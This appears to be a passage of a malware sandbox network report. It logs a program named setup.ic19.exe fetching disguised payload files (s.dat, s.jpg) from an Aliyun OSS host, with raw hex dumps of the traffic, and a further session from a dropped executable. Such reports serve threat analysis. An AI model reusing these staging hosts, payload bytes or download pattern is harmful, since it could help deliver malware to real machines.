2024-10-02 02:27:34 UTC	4096	IN	Data Raw: a7 88 96 55 e4 5a 41 ea 7f 47 8d 9d e1 22 57 54 6e da b0 a5 7e 01 95 a8 1a 9f 47 c9 12 bb b0 69 14 c6 2a fa 3f 21 b8 f1 28 5c be bd 65 8b 16 f4 a5 8e 95 c5 0a a0 cb c9 11 f9 2b 01 34 22 6f 74 96 82 d4 4d d6 d7 68 9c b9 27 e1 14 53 4b 48 e8 62 da 42 e5 e6 87 93 8f 40 cd 21 d8 ef 7f 49 a6 47 c2 f4 d9 ba 2e 7b 9f b5 fb 50 a1 ff ff 60 03 72 f5 06 e5 a7 4c c7 6e c4 c8 0c 8d a5 e9 23 05 12 da 75 53 48 1f 18 a1 70 25 4f 1c fe 54 20 21 7e 22 b8 e8 26 3f e7 2d 2a 1d c3 6b 30 96 64 04 57 9d 3e b5 0f c4 4c 39 5a e8 da c1 4d ad ea b6 8e e9 46 65 05 47 48 f9 5f 9c 1e eb 65 4f 86 b2 fb 9f 6d 56 56 4c 6c 52 45 6b e7 5f 7e 26 43 02 36 be b5 65 d6 67 0b 63 ea 38 cc 03 22 6c b0 78 a9 4c d8 4e 2d 8d 7a b9 f1 fb 7c 11 aa 03 a5 48 49 aa d7 92 86 0a 7f bd 8a 57 06 44 7c 12 48 Data Ascii: UZAG"WTn~Gi?!(\e+4"otMh'SKHbB@!IG.{P`rLn#uSHp%OT !~"&?-k0dW>L9ZMFeGH_eOmVVLlREk_~&C6egc8"lxLN-z\|HIWD\|H
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: 1f 9d 4c 6b 25 b6 86 0f 5d b1 e5 6e e2 c1 7b a2 a2 ef 47 65 07 41 ad 5b d6 00 d5 d3 2a ec 37 fb 9c ed d8 88 0f 28 4a 8c 66 74 bb bd 0a e8 75 a4 6b 91 7a a1 39 06 8b 22 e7 8e 58 74 d7 b9 a9 cf a9 25 6b 37 ef ff 17 f2 6f 6d 25 e4 df df d0 b6 b8 bc 98 16 be c9 27 c2 c7 0e ad 23 f3 77 55 cd 0d 3c a6 8b 8e 45 cd 53 08 2e a6 2a c2 a9 00 01 16 c6 1f a2 cc c0 a7 5c c0 bc 55 c7 b1 38 df 5e e1 73 f5 41 9c c0 3e 62 ca 27 62 b0 ca e7 be f3 da 34 91 84 78 07 28 29 10 e5 44 90 de 2c 67 3b e4 87 5a 2a 4e 49 8d f5 37 43 92 b7 89 f3 b3 87 8b 05 d1 e7 19 12 f6 d3 01 b2 4c cd 90 ff a7 99 b0 f2 e5 5e b3 26 e5 df b9 4d af 21 d9 fa 9c a1 06 9c fd 09 11 fe 73 9e 4b 8d 5d 0c 47 00 ae 06 9b 4d 32 b9 95 60 d5 c6 92 86 83 90 a9 4e ce d4 d3 83 c1 54 fb 58 07 80 55 8d 1f 72 a3 63 f4 Data Ascii: Lk%]n{GeA[7(Jftukz9"Xt%k7om%'#wU<ES.\U8^sA>b'b4x()D,g;Z*NI7CL^&M!sK]GM2`NTXUrc
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 71 73 71 77 71 73 71 7f 71 73 71 77 71 73 71 4f 51 53 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 31 33 31 37 31 33 31 3f 31 33 31 37 31 33 31 cf d1 d3 d1 d7 d1 d3 d1 df d1 d3 d1 d7 d1 d3 d1 cf f1 f3 f1 f7 f1 f3 f1 ff f1 f3 f1 f7 f1 f3 f1 cf d1 d3 d1 d7 d1 d3 d1 df d1 d3 d1 d7 d1 d3 d1 cf 31 33 31 37 31 33 31 3f 31 33 31 37 31 33 31 4f 51 53 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 71 73 71 77 71 73 71 7f 71 73 71 77 71 73 71 4f 51 53 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 31 33 31 37 31 33 31 3f 31 33 31 37 31 33 31 cf d1 d3 d1 d7 d1 d3 d1 df d1 d3 d1 d7 d1 d3 d1 cf f1 f3 f1 f7 f1 f3 f1 ff f1 f3 f1 f7 f1 f3 f1 cf d1 d3 d1 d7 d1 d3 d1 df d1 d3 d1 d7 d1 d3 d1 cf 31 33 31 37 31 33 31 3f 31 33 31 37 31 33 31 4f 51 Data Ascii: QWQSQ_QSQWQSQOqsqwqsqqsqwqsqOQSQWQSQ_QSQWQSQO1317131?13171311317131?1317131OQSQWQSQ_QSQWQSQOqsqwqsqqsqwqsqOQSQWQSQ_QSQWQSQO1317131?13171311317131?1317131OQ
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: 6a 47 1b 6a 61 ea f0 6f 91 dd 5e d7 5e 8b 07 02 70 30 8d fd e9 0b 50 bd 45 fc 05 71 dc cd aa d9 f8 3f 7b 49 a1 1f 32 27 75 35 5b 8c c6 60 e5 ba f8 93 aa d2 d4 00 0d c4 3b fb c7 87 db 72 41 78 5e f5 40 48 4c 42 6e 53 ae e2 e3 fc bc 92 dc 07 7f bd 85 16 8e 04 54 b7 67 55 e5 66 e6 bc 6c af 4f 3d ed ad 0e 94 dc cc 17 35 9d 2e 23 ef c4 e6 30 10 67 6f 99 06 01 9b a7 9e 27 b6 8e 72 a6 59 9d 8b cf 93 ae 4f 23 a4 d6 ca 51 a2 2a f3 25 98 32 92 4e 4f 86 75 bd 30 76 d9 37 2a bc 23 29 61 5c d1 d4 ec 6c a8 5b 9f 2d 69 44 7f e1 4d 39 b0 98 ac 1b a6 95 d8 7e 0f c6 3d fd 0a 4c 82 74 8c ff 7a 63 e0 69 f3 90 01 a3 20 71 12 f5 96 63 9a dc 25 d3 57 4d fc 98 74 3e ca 06 f9 3d 33 6f 33 df 69 29 9f 43 3e 32 68 02 a5 9c c4 36 80 0d c4 3b fb 5a 1c b7 80 61 83 17 04 60 8a 37 9d d6 Data Ascii: jGjao^^p0PEq?{I2'u5[`;rAx^@HLBnSTgUflO=5.#0go'rYO#Q%2NOu0v7#)a\l[-iDM9~=Ltzci qc%WMt>=3o3i)C>2h6;Za`7
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: 1a 2f d3 b8 b5 82 4c 85 04 98 f7 82 16 41 d0 88 43 ee ab f1 d1 28 9b 97 ac 6a 3e e1 2a 6f 80 bf e0 82 32 36 cc e2 70 4e 12 ce 0c 1b 36 5f e5 dd e2 7a 74 d6 ae ed f0 e4 da d3 ec 2e 15 68 1a 15 d5 92 47 75 d5 39 91 00 85 c2 c8 73 86 25 15 2e ec 0e d5 4d 34 30 9e 21 36 d1 df a2 cf 0e 06 38 35 0a cc 03 82 45 95 03 f0 8b f1 04 95 d5 da d7 cc 8c cf 45 91 68 db d7 ec 2a 11 ce 56 41 52 80 7d 79 5d 62 55 27 90 ba ce bc b5 8e 4c b8 05 ce 1d 1a 38 f0 8c ee 78 3f 96 d9 7a 6a 4f 0a 50 49 d7 bd b5 8e 4c c7 14 7a f4 97 7d 07 4b 3b 1b ca f3 b7 69 48 37 d4 d5 ee 2c 24 a1 6a 7d 8a 81 43 0f 15 6b 56 2d 9e 13 4b 3b 33 0c ce e9 2a 78 19 7c 3a 6a f8 18 6f f1 85 3c e8 e9 18 15 12 cc 33 b2 2e 4d d8 70 d6 c6 e0 28 c1 9c a8 b6 1d 33 2b 66 46 f4 dc db db ec 2e a6 7d b2 24 43 27 61 Data Ascii: /LAC(j>o26pN6_zt.hGu9s%.M40!685EEhVAR}y]bU'L8x?zjOPILz}K;iH7,$j}CkV-K;3*x\|:jo<3.Mp(3+fF.}$C'a
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: 80 aa b9 d0 b8 5a b4 96 a8 94 58 5a 49 67 bd 52 86 6a 45 7c bb 43 0a 8b 55 d5 40 59 e6 a8 6a b0 78 9b b0 9b b0 77 2b c2 b0 ea f1 e1 49 43 ae 90 52 7e 55 50 19 f3 50 fb 8c a3 7c 16 76 c1 1b 78 9f 69 97 d7 e8 06 28 31 86 47 64 80 f8 03 10 3a d0 c5 73 07 46 0d f0 7c d3 46 7c b0 21 3d 02 fb 1d 76 18 4e 0c 4f a4 50 1c 38 1e 52 3e b6 a5 b3 22 3f 8a f9 9c 6c 18 ff 10 fe fc ed 7d a3 1e c5 57 51 9f f3 d8 2f e3 63 3e 0a bf ad c9 1a f4 13 84 d4 b2 97 8f 4e 6e 54 a6 2c b7 87 6d 20 60 85 58 7b 86 03 0c 53 08 ea 95 04 a9 4b 69 4b e3 d2 c3 18 19 ff 90 f5 3d 06 24 7a 23 24 34 12 71 e0 f9 56 07 c1 92 f6 1d b2 1b 20 dd 1b b8 95 71 7f 2a f4 75 19 c3 ed df 0f f7 ba 32 db 3d ee 1b f1 29 b7 95 81 3a 08 ab 3a 23 80 d0 c1 92 e6 fd d2 fa 16 91 2b 58 aa c0 52 88 09 65 44 66 24 e4 Data Ascii: ZXZIgRjE\|CU@Yjxw+ICR~UPP\|vxi(1Gd:sF\|F\|!=vNOP8R>"?l}WQ/c>NnT,m `X{SKiK=$z#$4qV q*u2=)::#+XReDf$
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: e8 e2 59 38 f2 b8 1c 30 3e 87 03 e1 90 b4 69 42 d3 e9 12 0e d0 0a 38 ca 89 c0 49 b8 a9 4e 28 e3 e0 fe 2e aa a3 fc 8b 84 d3 bf 36 47 78 37 25 e5 53 38 38 b5 84 8c 05 89 af 08 21 fa 43 12 e5 ed 3c 8d 54 3f 43 c6 5d 33 69 7a a1 7c 1a f1 48 f5 ea 35 4b 22 de 24 cb 13 2b 62 5b 80 2a 64 da 09 3b 5e db 8a 0a b3 43 09 34 d2 5b 9b 0a a1 c7 b4 ac a6 12 e4 7f b5 84 9b cc b4 ba a6 fb 71 e8 55 5b da 52 70 17 54 ba 8b 9f f2 a2 e3 ed 9b 89 12 64 bc 4f ca 77 0e d9 06 7f 1e 6d 07 53 5f e7 6f c4 9d 6f ea 57 1a 93 e9 22 b3 5b 9f 92 84 8f 20 6a 1a fb 7e 67 ab 1a 4a 9e 7c c1 d8 fa f1 68 55 59 86 f8 76 87 91 0d f8 16 d3 04 c8 b8 52 07 4c c4 ee 79 48 06 7e e1 e2 d1 df 08 e8 d9 60 a3 8c 8d bc 63 ef e1 5c 92 9d 59 e8 e5 84 9e 1f 12 40 f1 79 52 cf 9f 4d 7e ae 5b 60 11 7d 6e 66 c6 Data Ascii: Y80>iB8IN(.6Gx7%S88!C<T?C]3iz\|H5K"$+b[*d;^C4[qU[RpTdOwmS_ooW"[ j~gJ\|hUYvRLyH~`c\Y@yRM~[`}nf
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: df 2b 50 96 0c 5a 38 0a f4 27 f0 82 0c 80 6f 10 70 64 d0 0c 7c 7c 07 03 c4 75 f4 e3 80 0e 4c dd d8 cd ec 5b c0 3d 5c 8c 18 6d b3 f4 52 b8 75 e2 7d 6f 37 83 93 75 08 40 29 fe fa a6 85 dc c6 67 d9 6e 65 19 b6 2f 3d 27 29 c3 d5 85 c2 d8 0e 3e d1 13 d5 25 2a 20 46 76 11 d3 c5 35 0a 70 de e0 ab bf 38 57 91 27 9b 24 1a 95 b8 24 f6 1a c9 8f 0d f9 a2 a4 96 80 12 00 08 c7 9c 08 d2 5e c7 15 bd bd f2 82 8c ee c9 45 0d 8b 37 97 6a fb 80 c4 cc 93 6a 4a 77 16 ed d6 32 6e ac 3a 8e 58 34 bb 7b 39 f5 27 53 b9 a3 cd 29 50 07 cf 3f be fa 48 47 9f 9e 21 eb d6 a2 a1 6b 44 38 1e af a1 57 29 02 97 a6 05 b6 65 5e 11 8a c9 6c 4c fa 40 b8 a2 9d 99 0d e9 94 22 36 86 25 9c f4 89 cb a9 1b da a4 da 13 0e 0b d6 29 f1 da 63 ba 45 aa c2 82 2b f9 83 fa 9c 94 19 20 11 14 f5 fa f9 b1 9e 2f Data Ascii: +PZ8'opd\|\|uL[=\mRu}o7u@)gne/=')>%* Fv5p8W'$$^E7jjJw2n:X4{9'S)P?HG!kD8W)e^lL@"6%)cE+ /

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:40 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:41 UTC	561	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:41 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 66FCAF9DF6DE1935355543B2 Accept-Ranges: bytes ETag: "417B6DED46C6D49F327BAAE87113475C" Last-Modified: Wed, 02 Oct 2024 02:27:28 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 15460916302067960989 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: QXtt7UbG1J8ye6rocRNHXA== x-oss-server-time: 12
2024-10-02 02:27:41 UTC	3535	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2024-10-02 02:27:41 UTC	4096	IN	Data Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 Data Ascii: #_##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2024-10-02 02:27:41 UTC	4096	IN	Data Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2024-10-02 02:27:41 UTC	4096	IN	Data Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f Data Ascii: 80JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKS
2024-10-02 02:27:41 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2024-10-02 02:27:41 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2024-10-02 02:27:41 UTC	4096	IN	Data Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed Data Ascii: gG<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2024-10-02 02:27:41 UTC	161	IN	Data Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 9b ba 39 bf Data Ascii: 'VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:42 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:43 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:42 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 66FCAF9E5A53BB353856781F Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Mon, 30 Sep 2024 05:41:23 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 1
2024-10-02 02:27:43 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:27:43 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2024-10-02 02:27:43 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	118.178.60.61	443	4452	C:\Users\user\AppData\Roaming\8AfroU.exe

Timestamp	Bytes transferred	Direction	Data
